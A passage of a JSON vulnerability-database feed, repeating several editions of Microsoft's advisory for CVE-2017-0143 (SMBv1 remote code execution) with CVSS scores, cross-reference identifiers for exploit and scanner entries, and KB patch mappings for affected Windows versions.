"saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB3177186", "KB3205409", "KB4012598", "KBMS16-110, 3187754", "KB3213986", "KB4012217", "KB4013198", "KB4013429", "KB3210720", "KB4012606", "KB4012213", "KB3210721", "KB4012216", "KB4012214", "KB4012212", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T08:45:32", "differentElements": ["msAffectedSoftware"], "edition": 25}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-10T10:45:12", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4013198", "KB4012213", "KB3205409", "KB4012598", "KB4012216", "KB4012217", "KB4012212", "KB3177186", "KB3210720", "KB3213986", "KB3205401", "KB4012606", "KB3210721", "KB4013429", "KB4012215", "KBMS16-110, 3187754", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T10:45:12", "differentElements": ["msAffectedSoftware"], "edition": 26}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-10T18:58:50", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3205409", "KB4012216", "KB3213986", "KB3212646", "KB4012213", "KB3210720", "KB4013429", "KB4012606", "KB4012214", 